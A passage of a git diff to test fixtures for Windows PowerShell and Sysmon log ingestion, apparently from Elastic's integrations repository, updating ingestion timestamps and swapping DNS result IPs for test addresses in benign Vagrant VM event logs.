@@ -261,7 +261,7 @@ }, "event": { "sequence": 33, - "ingested": "2021-06-14T13:23:14.028872600Z", + "ingested": "2021-12-09T13:50:22.454914900Z", "code": "403", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e403\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T15:31:22.426923800Z'/\u003e\u003cEventRecordID\u003e1687\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eStopped\u003c/Data\u003e\u003cData\u003eAvailable\u003c/Data\u003e\u003cData\u003e\tNewEngineState=Stopped\n\tPreviousEngineState=Available\n\n\tSequenceNumber=33\n\n\tHostName=Windows PowerShell ISE Host\n\tHostVersion=5.1.17763.1007\n\tHostId=1929aa68-472a-404a-8ead-96bd7b49f2db\n\tHostApplication=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=6f14a54e-5992-42dd-b38c-68830a28b1b6\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e403\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:11:47.932007000Z'/\u003e\u003cEventRecordID\u003e1706\u003c/EventRecordID\u003e\u003cChannel\u003eWindows 
PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eStopped\u003c/Data\u003e\u003cData\u003eAvailable\u003c/Data\u003e\u003cData\u003e\tNewEngineState=Stopped\n\tPreviousEngineState=Available\n\n\tSequenceNumber=37\n\n\tHostName=ServerRemoteHost\n\tHostVersion=1.0.0.0\n\tHostId=ed57761b-ba0f-4d11-87d9-fac33820d20e\n\tHostApplication=C:\\Windows\\system32\\wsmprovhost.exe -Embedding\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=0729459a-8646-4176-8b02-024421a9632e\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e403\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:28:53.626698200Z'/\u003e\u003cEventRecordID\u003e1766\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eStopped\u003c/Data\u003e\u003cData\u003eAvailable\u003c/Data\u003e\u003cData\u003e\tNewEngineState=Stopped\n\tPreviousEngineState=Available\n\n\tSequenceNumber=37\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.17763.1007\n\tHostId=f9cd0d65-6665-4b88-9142-f03a2d20f8b8\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -executionpolicy bypass -encodedCommand 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 -inputFormat xml -outputFormat 
text\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=8228a4bd-3125-4d1a-997b-3a4df8c085f2\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e403\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-06-04T07:20:28.686193900Z'/\u003e\u003cEventRecordID\u003e18592\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eStopped\u003c/Data\u003e\u003cData\u003eAvailable\u003c/Data\u003e\u003cData\u003e\tNewEngineState=Stopped\n\tPreviousEngineState=Available\n\n\tSequenceNumber=10\n\n\tHostName=ConsoleHost\n\tHostVersion=2.0\n\tHostId=7018c049-c75b-4e02-9c0f-6761b97e1657\n\tEngineVersion=2.0\n\tRunspaceId=6ebeca05-d618-4c66-a0d8-4269d800d099\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "PowerShell", diff --git a/packages/windows/data_stream/powershell_operational/_dev/test/pipeline/test-events.json-expected.json b/packages/windows/data_stream/powershell_operational/_dev/test/pipeline/test-events.json-expected.json index 317024751d8..ab35590698f 100644 --- a/packages/windows/data_stream/powershell_operational/_dev/test/pipeline/test-events.json-expected.json +++ b/packages/windows/data_stream/powershell_operational/_dev/test/pipeline/test-events.json-expected.json 
@@ -37,7 +37,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:23:14.352106200Z", + "ingested": "2021-12-09T13:50:22.931472300Z", "code": "4105", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4105\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e102\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-13T09:04:04.755232500Z'/\u003e\u003cEventRecordID\u003e790\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{dd68516a-2930-0000-5962-68dd3029d601}'/\u003e\u003cExecution ProcessID='4204' ThreadID='1476'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ScriptBlockId'\u003ef4a378ab-b74f-41a7-a5ef-6dd55562fdb9\u003c/Data\u003e\u003cData Name='RunspaceId'\u003e9c031e5c-8d5a-4b91-a12e-b3624970b623\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", 
@@ -148,7 +148,7 @@ }, "event": { "sequence": 34, - "ingested": "2021-06-14T13:23:14.352142600Z", + "ingested": "2021-12-09T13:50:22.931480800Z", "code": "4103", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4103\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e106\u003c/Task\u003e\u003cOpcode\u003e20\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:11:47.897949500Z'/\u003e\u003cEventRecordID\u003e3885\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{1aca0717-2acb-0002-c208-ca1acb2ad601}'/\u003e\u003cExecution ProcessID='3984' ThreadID='3616'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ContextInfo'\u003e Severity = Informational\n Host Name = ServerRemoteHost\n Host Version = 1.0.0.0\n Host ID = ed57761b-ba0f-4d11-87d9-fac33820d20e\n Host Application = C:\\Windows\\system32\\wsmprovhost.exe -Embedding\n Engine Version = 5.1.17763.1007\n Runspace ID = 0729459a-8646-4176-8b02-024421a9632e\n Pipeline ID = 1\n Command Name = cmd.exe\n Command Type = Application\n Script Name =\n Command Path = C:\\Windows\\system32\\cmd.exe\n Sequence Number = 34\n User = VAGRANT\\vagrant\n Connected User = VAGRANT\\vagrant\n Shell ID = Microsoft.PowerShell\n\u003c/Data\u003e\u003cData Name='UserData'\u003e\u003c/Data\u003e\u003cData Name='Payload'\u003eCommandInvocation(cmd.exe): \"cmd.exe\"\nCommandInvocation(Out-Null): \"Out-Null\"\nParameterBinding(Out-Null): name=\"InputObject\"; value=\"symbolic link created for C:\\vagrant 
\u0026lt;\u0026lt;===\u0026gt;\u0026gt; \\\\vboxsvr\\vagrant\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4103\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e106\u003c/Task\u003e\u003cOpcode\u003e20\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:13:06.703293900Z'/\u003e\u003cEventRecordID\u003e3917\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{1aca0717-2acb-0003-db0b-ca1acb2ad601}'/\u003e\u003cExecution ProcessID='5032' ThreadID='4160'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ContextInfo'\u003e Severity = Informational\n Host Name = ConsoleHost\n Host Version = 5.1.17763.1007\n Host ID = aae5217d-054f-435f-9968-4b5bebf12116\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command 'C:\\Gopath\\src\\github.com\\elastic\\beats'\n Engine Version = 5.1.17763.1007\n Runspace ID = a87e8389-57c7-4997-95ff-f82f644965bf\n Pipeline ID = 9\n Command Name = Resolve-Path\n Command Type = Cmdlet\n Script Name =\n Command Path =\n Sequence Number = 22\n User = VAGRANT\\vagrant\n Connected User =\n Shell ID = Microsoft.PowerShell\n\u003c/Data\u003e\u003cData Name='UserData'\u003e\u003c/Data\u003e\u003cData Name='Payload'\u003eCommandInvocation(Resolve-Path): \"Resolve-Path\"\nParameterBinding(Resolve-Path): name=\"ErrorAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): name=\"WarningAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): 
name=\"InformationAction\"; value=\"Ignore\"\nParameterBinding(Resolve-Path): name=\"Verbose\"; value=\"False\"\nParameterBinding(Resolve-Path): name=\"Debug\"; value=\"False\"\nParameterBinding(Resolve-Path): name=\"Path\"; value=\"C:\\Gopath\\src\\github.com\\elastic\\beats\\x*\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", @@ -199,7 +199,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:23:14.352153200Z", + "ingested": "2021-12-09T13:50:22.931486800Z", "code": "4106", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4106\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e103\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-13T10:40:32.595715200Z'/\u003e\u003cEventRecordID\u003e933\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{e3200b8a-290e-0002-332a-20e30e29d601}'/\u003e\u003cExecution ProcessID='4776' ThreadID='5092'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='ScriptBlockId'\u003e4c487c13-46f7-4485-925b-34855c7e873c\u003c/Data\u003e\u003cData Name='RunspaceId'\u003e3f1a9181-0523-4645-a42c-2c1868c39332\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", 
@@ -253,7 +253,7 @@ "name": "vagrant" }, "event": { - "ingested": "2021-06-14T13:23:14.352162600Z", + "ingested": "2021-12-09T13:50:22.931492Z", "code": "4104", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4104\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T11:33:51.389266200Z'/\u003e\u003cEventRecordID\u003e3580\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{fb13c9de-29f7-0001-18e0-13fbf729d601}'/\u003e\u003cExecution ProcessID='4844' ThreadID='4428'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='MessageNumber'\u003e1\u003c/Data\u003e\u003cData Name='MessageTotal'\u003e1\u003c/Data\u003e\u003cData Name='ScriptBlockText'\u003e.\\patata.ps1\u003c/Data\u003e\u003cData Name='ScriptBlockId'\u003e50d2dbda-7361-4926-a94d-d9eadfdb43fa\u003c/Data\u003e\u003cData Name='Path'\u003e\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4104\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated 
SystemTime='2020-05-14T11:33:51.393884800Z'/\u003e\u003cEventRecordID\u003e3582\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{fb13c9de-29f7-0000-79db-13fbf729d601}'/\u003e\u003cExecution ProcessID='4844' ThreadID='4428'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='MessageNumber'\u003e1\u003c/Data\u003e\u003cData Name='MessageTotal'\u003e1\u003c/Data\u003e\u003cData Name='ScriptBlockText'\u003e\u003c/Data\u003e\u003cData Name='ScriptBlockId'\u003ef5521cbd-656e-4296-b74d-9ffb4eec23b0\u003c/Data\u003e\u003cData Name='Path'\u003eC:\\Users\\vagrant\\Desktop\\patata.ps1\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", diff --git a/packages/windows/data_stream/sysmon_operational/_dev/test/pipeline/test-events.json b/packages/windows/data_stream/sysmon_operational/_dev/test/pipeline/test-events.json index 38fa8984939..b4bd0afd978 100644 --- a/packages/windows/data_stream/sysmon_operational/_dev/test/pipeline/test-events.json +++ b/packages/windows/data_stream/sysmon_operational/_dev/test/pipeline/test-events.json @@ -15,7 +15,7 @@ "ProcessId": "356", "QueryName": "go.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:23.223.14.67;", + "QueryResults": "type: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe" }, "provider_name": "Microsoft-Windows-Sysmon", 
@@ -33,7 +33,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025223900Z'/\u003e\u003cEventRecordID\u003e66\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.239\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ego.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:23.223.14.67;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025223900Z'/\u003e\u003cEventRecordID\u003e66\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.239\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ego.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -58,7 +58,7 @@ "event_data": { "QueryName": "www.msn.com", "QueryStatus": "0", - "QueryResults": "type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;", + "QueryResults": "type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:01.261", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -73,7 +73,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025237700Z'/\u003e\u003cEventRecordID\u003e67\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.261\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025237700Z'/\u003e\u003cEventRecordID\u003e67\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.261\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } 
@@ -123,7 +123,7 @@ { "@timestamp": "2021-05-05T15:30:51.692Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025262300Z'/\u003e\u003cEventRecordID\u003e68\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.449\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-global-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1999.dscg2.akamai.net;::ffff:23.50.53.192;::ffff:23.50.53.195;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025262300Z'/\u003e\u003cEventRecordID\u003e68\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.449\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-global-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1999.dscg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 